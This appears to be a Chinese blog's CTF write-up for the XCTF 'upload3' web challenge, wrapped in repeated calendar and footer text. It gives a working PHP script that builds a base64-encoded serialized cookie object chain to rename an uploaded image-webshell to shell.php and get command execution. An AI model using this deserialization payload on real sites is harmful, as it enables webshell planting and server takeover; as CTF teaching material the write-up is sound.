刘功瑞的博客-XCTF 攻防世界 web进阶 upload3 WriteUp（备份文件,代码审计,php反序列化）

XCTF 攻防世界 web进阶 upload3 WriteUp（备份文件,代码审计,php反序列化）

这里首先想到的就是上传木马，但是经过尝试只能上传图片马，并且不能直接利用，经过抓包发现cookie是序列化内容，所以应该是通过cookie传递序列化内容，经过服务器的反序列化，然后对图片进行重命名操作，进而获得shell

生成序列化cookie

<?php

class Profile
{
    public $checker = 0;
    public $filename_tmp = "../public/upload/857df6c0d34905192d9590ee20956813/a7c3ce076585477741d951d179ab07dc.png";//上传的图片马地址
    public $filename = "../public/upload/857df6c0d34905192d9590ee20956813/shell.php"; //生成的shell地址
    public $upload_menu;
    public $ext = 1;
    public $img;
    public $except = array('index' => 'upload_img');

}
class Register
{
    public $checker;
    public $registed = 0;
}

$a = new Register();
$a->checker = new Profile();
$a->checker->checker = 0;
// echo serialize($a);
echo base64_encode(serialize($a));
?>

替换cookie后，访问shell.php 执行命令，拿到flag

« 2024年5月 »
一	二	三	四	五	六	日
	1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

« 2024年5月 »

一

二

三

四

五

六

日

刘功瑞的博客

有一天你突然惊醒，发现这一切，都只不过是一场梦。

2019年12月13日

XCTF 攻防世界 web进阶 upload3 WriteUp（备份文件,代码审计,php反序列化）

标签：备份文件 代码审计 php反序列化

作者:admin , 分类:CTF , 浏览:741 , 评论:0

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.

刘功瑞的博客

有一天你突然惊醒，发现这一切，都只不过是一场梦。

2019年12月13日

XCTF 攻防世界 web进阶 upload3 WriteUp（备份文件,代码审计,php反序列化）

标签：备份文件 代码审计 php反序列化

作者:admin , 分类:CTF , 浏览:741 , 评论:0

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.

标签：备份文件代码审计 php反序列化